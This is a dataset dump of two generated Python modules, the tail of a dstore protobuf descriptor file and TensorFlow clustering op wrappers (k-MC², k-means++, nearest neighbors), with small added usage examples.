\x01(\x08\"\x86\x02\n\x08Response\x12\x38\n\x10meta_information\x18\x02 \x03(\x0b\x32\x1e.dstore.engine.MetaInformation\x12\'\n\x07message\x18\x03 \x03(\x0b\x32\x16.dstore.engine.Message\x12\x45\n\x03row\x18\x04 \x03(\x0b\x32\x38.dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row\x12\x38\n\x13\x61pplication_part_id\x18\x65 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x1a\x16\n\x03Row\x12\x0f\n\x06row_id\x18\x90N \x01(\x05\x42]\n\x1bio.dstore.engine.proceduresZ>gosdk.dstore.de/engine/procedures/mi_ModifyApplicationParts_Adb\x06proto3')
,
dependencies=[dstore_dot_values__pb2.DESCRIPTOR,dstore_dot_engine_dot_engine__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PARAMETERS = _descriptor.Descriptor(
name='Parameters',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='application_part_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_id_null', index=1,
number=1001, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_id', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_id_null', index=3,
number=1002, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.user_id', index=4,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.user_id_null', index=5,
number=1003, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part', index=6,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_null', index=7,
number=1004, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delete', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.delete', index=8,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delete_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.delete_null', index=9,
number=1005, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=157,
serialized_end=567,
)
_RESPONSE_ROW = _descriptor.Descriptor(
name='Row',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='row_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row.row_id', index=0,
number=10000, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=810,
serialized_end=832,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='meta_information', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.meta_information', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='message', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.message', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='row', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.row', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.application_part_id', index=3,
number=101, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RESPONSE_ROW, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=570,
serialized_end=832,
)
_PARAMETERS.fields_by_name['application_part_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['application_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['application_part'].message_type = dstore_dot_values__pb2._STRINGVALUE
_PARAMETERS.fields_by_name['delete'].message_type = dstore_dot_values__pb2._BOOLEANVALUE
_RESPONSE_ROW.containing_type = _RESPONSE
_RESPONSE.fields_by_name['meta_information'].message_type = dstore_dot_engine_dot_engine__pb2._METAINFORMATION
_RESPONSE.fields_by_name['message'].message_type = dstore_dot_engine_dot_engine__pb2._MESSAGE
_RESPONSE.fields_by_name['row'].message_type = _RESPONSE_ROW
_RESPONSE.fields_by_name['application_part_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
DESCRIPTOR.message_types_by_name['Parameters'] = _PARAMETERS
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
Parameters = _reflection.GeneratedProtocolMessageType('Parameters', (_message.Message,), dict(
DESCRIPTOR = _PARAMETERS,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Parameters)
))
_sym_db.RegisterMessage(Parameters)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE_ROW,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row)
))
,
DESCRIPTOR = _RESPONSE,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Response)
))
_sym_db.RegisterMessage(Response)
_sym_db.RegisterMessage(Response.Row)
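def _example_build_parameters():
  """Editor's usage sketch, not produced by protoc. It assumes the dstore
  value wrappers (IntegerValue, StringValue, BooleanValue) expose a `value`
  field, mirroring the google.protobuf wrapper types.
  """
  params = Parameters(
      application_id=dstore_dot_values__pb2.IntegerValue(value=42),
      application_part=dstore_dot_values__pb2.StringValue(value='Checkout'),
      delete=dstore_dot_values__pb2.BooleanValue(value=False))
  # Round-trip through the wire format, as an RPC layer would.
  return Parameters.FromString(params.SerializeToString())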
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.dstore.engine.proceduresZ>gosdk.dstore.de/engine/procedures/mi_ModifyApplicationParts_Ad'))
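# The imports below are emitted by the gRPC Python plugin of this generation
# era even though the .proto file defines no services; they are unused here.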
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
8ae19cbd850184aed62ae571f1842958bc3b35ad | e1a2c6ed4a4b93b4697974e3b0a32a4d67daa6f6 | /venv/Lib/site-packages/tensorflow/contrib/factorization/python/ops/gen_clustering_ops.py | 54753d93470f6b328c34c4bb6b06094b62bac888 | [
"MIT"
] | permissive | ishatserka/MachineLearningAndDataAnalysisCoursera | cdf0f23a58617e17d6b938e3a9df17daae8585e4 | e82e772df2f4aec162cb34ac6127df10d14a625a | refs/heads/master | 2021-09-11T01:39:26.228392 | 2018-04-05T14:33:39 | 2018-04-05T14:33:39 | 117,153,454 | 0 | 0 | MIT | 2018-03-27T05:20:37 | 2018-01-11T21:05:33 | Python | UTF-8 | Python | false | false | 8,994 | py | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.tf_export import tf_export
@tf_export('KMC2ChainInitialization')
def kmc2_chain_initialization(distances, seed, name=None):
r"""Returns the index of a data point that should be added to the seed set.
Entries in distances are assumed to be squared distances of candidate points to
the already sampled centers in the seed set. The op constructs one Markov chain
of the k-MC^2 algorithm and returns the index of one candidate point to be added
as an additional cluster center.
Args:
distances: A `Tensor` of type `float32`.
Vector with squared distances to the closest previously sampled
cluster center for each candidate point.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`. Scalar with the index of the sampled point.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"KMC2ChainInitialization", distances=distances, seed=seed, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
distances = _ops.convert_to_tensor(distances, _dtypes.float32)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
_inputs_flat = [distances, seed]
_attrs = None
_result = _execute.execute(b"KMC2ChainInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
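def _example_kmc2_chain_initialization():
  """Editor's usage sketch (not part of the generated wrappers), assuming the
  TF 1.x graph/session workflow of this contrib module.
  """
  import tensorflow as tf  # local import: example only
  # Squared L2 distances of four candidate points to the current seed set.
  distances = tf.constant([4.0, 1.0, 9.0, 0.25])
  seed = tf.constant(7, dtype=tf.int64)
  index = kmc2_chain_initialization(distances, seed)
  with tf.Session() as sess:
    return sess.run(index)  # index of the candidate picked by the k-MC^2 chain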
@tf_export('KmeansPlusPlusInitialization')
def kmeans_plus_plus_initialization(points, num_to_sample, seed, num_retries_per_sample, name=None):
r"""Selects num_to_sample rows of input using the KMeans++ criterion.
Rows of points are assumed to be input points. One row is selected at random.
Subsequent rows are sampled with probability proportional to the squared L2
distance from the nearest row selected so far, until num_to_sample rows have
been sampled.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
num_to_sample: A `Tensor` of type `int64`.
Scalar. The number of rows to sample. This value must not be
larger than n.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
num_retries_per_sample: A `Tensor` of type `int64`.
Scalar. For each row that is sampled, this parameter
specifies the number of additional points to draw from the current
distribution before selecting the best. If a negative value is specified, a
heuristic is used to sample O(log(num_to_sample)) additional points.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
Matrix of shape (num_to_sample, d). The sampled rows.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"KmeansPlusPlusInitialization", points=points,
num_to_sample=num_to_sample, seed=seed,
num_retries_per_sample=num_retries_per_sample, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
points = _ops.convert_to_tensor(points, _dtypes.float32)
num_to_sample = _ops.convert_to_tensor(num_to_sample, _dtypes.int64)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
num_retries_per_sample = _ops.convert_to_tensor(num_retries_per_sample, _dtypes.int64)
_inputs_flat = [points, num_to_sample, seed, num_retries_per_sample]
_attrs = None
_result = _execute.execute(b"KmeansPlusPlusInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
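def _example_kmeans_plus_plus_initialization():
  """Editor's usage sketch (not part of the generated wrappers): sample two
  centers from five points; num_retries_per_sample=-1 selects the heuristic
  number of extra candidate draws described in the docstring above.
  """
  import tensorflow as tf  # local import: example only
  points = tf.constant([[0., 0.], [0., 1.], [10., 0.], [10., 1.], [5., 5.]])
  centers = kmeans_plus_plus_initialization(
      points,
      num_to_sample=tf.constant(2, tf.int64),
      seed=tf.constant(7, tf.int64),
      num_retries_per_sample=tf.constant(-1, tf.int64))
  with tf.Session() as sess:
    return sess.run(centers)  # shape (2, 2): the sampled rows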
_nearest_neighbors_outputs = ["nearest_center_indices",
"nearest_center_distances"]
_NearestNeighborsOutput = _collections.namedtuple(
"NearestNeighbors", _nearest_neighbors_outputs)
@tf_export('NearestNeighbors')
def nearest_neighbors(points, centers, k, name=None):
r"""Selects the k nearest centers for each point.
Rows of points are assumed to be input points. Rows of centers are assumed to be
the list of candidate centers. For each point, the k centers that have least L2
distance to it are computed.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
centers: A `Tensor` of type `float32`.
Matrix of shape (m, d). Rows are assumed to be centers.
k: A `Tensor` of type `int64`.
Scalar. Number of nearest centers to return for each point. If k is larger
than m, then only m centers are returned.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (nearest_center_indices, nearest_center_distances).
nearest_center_indices: A `Tensor` of type `int64`. Matrix of shape (n, min(m, k)). Each row contains the
indices of the centers closest to the corresponding point, ordered by
increasing distance.
nearest_center_distances: A `Tensor` of type `float32`. Matrix of shape (n, min(m, k)). Each row contains the
squared L2 distance to the corresponding center in nearest_center_indices.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"NearestNeighbors", points=points, centers=centers, k=k, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
points = _ops.convert_to_tensor(points, _dtypes.float32)
centers = _ops.convert_to_tensor(centers, _dtypes.float32)
k = _ops.convert_to_tensor(k, _dtypes.int64)
_inputs_flat = [points, centers, k]
_attrs = None
_result = _execute.execute(b"NearestNeighbors", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
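def _example_nearest_neighbors():
  """Editor's usage sketch: the single (k=1) nearest center for each point."""
  import tensorflow as tf  # local import: example only
  points = tf.constant([[0., 0.], [10., 10.]])
  centers = tf.constant([[1., 1.], [9., 9.]])
  result = nearest_neighbors(points, centers, tf.constant(1, tf.int64))
  with tf.Session() as sess:
    indices, sq_dists = sess.run([result.nearest_center_indices,
                                  result.nearest_center_distances])
  return indices, sq_dists  # [[0], [1]] and [[2.], [2.]] (squared L2)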
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "KMC2ChainInitialization"
# input_arg {
# name: "distances"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# output_arg {
# name: "index"
# type: DT_INT64
# }
# }
# op {
# name: "KmeansPlusPlusInitialization"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "num_to_sample"
# type: DT_INT64
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "num_retries_per_sample"
# type: DT_INT64
# }
# output_arg {
# name: "samples"
# type: DT_FLOAT
# }
# }
# op {
# name: "NearestNeighbors"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "centers"
# type: DT_FLOAT
# }
# input_arg {
# name: "k"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_indices"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_distances"
# type: DT_FLOAT
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n=\n\027KMC2ChainInitialization\022\r\n\tdistances\030\001\022\010\n\004seed\030\t\032\t\n\005index\030\t\np\n\034KmeansPlusPlusInitialization\022\n\n\006points\030\001\022\021\n\rnum_to_sample\030\t\022\010\n\004seed\030\t\022\032\n\026num_retries_per_sample\030\t\032\013\n\007samples\030\001\nl\n\020NearestNeighbors\022\n\n\006points\030\001\022\013\n\007centers\030\001\022\005\n\001k\030\t\032\032\n\026nearest_center_indices\030\t\032\034\n\030nearest_center_distances\030\001")
| [
"[email protected]"
] |